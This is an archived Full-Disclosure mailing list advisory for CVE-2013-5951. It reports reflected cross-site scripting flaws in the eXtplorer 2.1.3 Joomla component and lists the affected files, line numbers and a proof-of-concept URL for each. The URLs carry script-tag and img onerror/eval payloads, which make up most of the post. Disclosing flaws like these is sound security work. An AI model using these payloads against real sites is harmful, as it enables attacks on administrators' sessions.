lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Sat, 15 Mar 2014 04:35:32 -0700 (PDT) From: Mahmoud Ghorbanzadeh <mdgh9@...oo.com> To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk> Subject: [CVE-2013-5951] Multiple Cross Site Scripting Vulnerabilities in eXtplorer 2.1.3 Hello, Multiple cross-site scripting (XSS) vulnerabilities in eXtplorer 2.1.3 component for Joomla! allow remote attackers to inject arbitrary web script or HTML code via a crafted string inthe URL to application.js.php, admin.php, copy_move.php, functions.php, header.php and upload.php. File: /scripts/application.js.php Line: 45 POC: http://site/administrator/index.php/"></script><script>alert('XSS')</script>?option=com_extplorer&tmpl=component File: /include/admin.php Lines: 72, 143, 176 and 210 POC: http://site/administrator/index.php<img src=x:alert(alt) onerror=eval(src) alt=XSS>?option=com_extplorer&tmpl=component&action=post&do_action=admin File: /include/copy_move.php Line: 158 POC: http://site/administrator/index.php/<img src=x onerror=alert('XSS') >?option=com_extplorer&tmpl=component&action=post&do_action=copy File: /include/functions.php Line: 933 POC: http://site/administrator/index.php/"></script><script>alert('XSS')</script>?option=com_extplorer&tmpl=component File: /include/header.php Line: 73 POC: http://site/administrator/index.php/"></script><script>alert('XSS')</script>?option=com_extplorer&tmpl=component File: /include/upload.php Lines: 191 and 259 POC: http://site/administrator/index.php/<img src=x:alert(alt) onerror=eval(src) alt=XSS>?option=com_extplorer&tmpl=component&action=upload Discovered by Mahmoud Ghorbanzadeh, in Amirkabir University of Technology's Scientific Excellence and Research Centers. Best Regards. Content of type "text/html" skipped Download attachment "Extplorer XSS Vulnerabilities Report.docx" of type "application/vnd.openxmlformats-officedocument.wordprocessingml.document" (80554 bytes) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists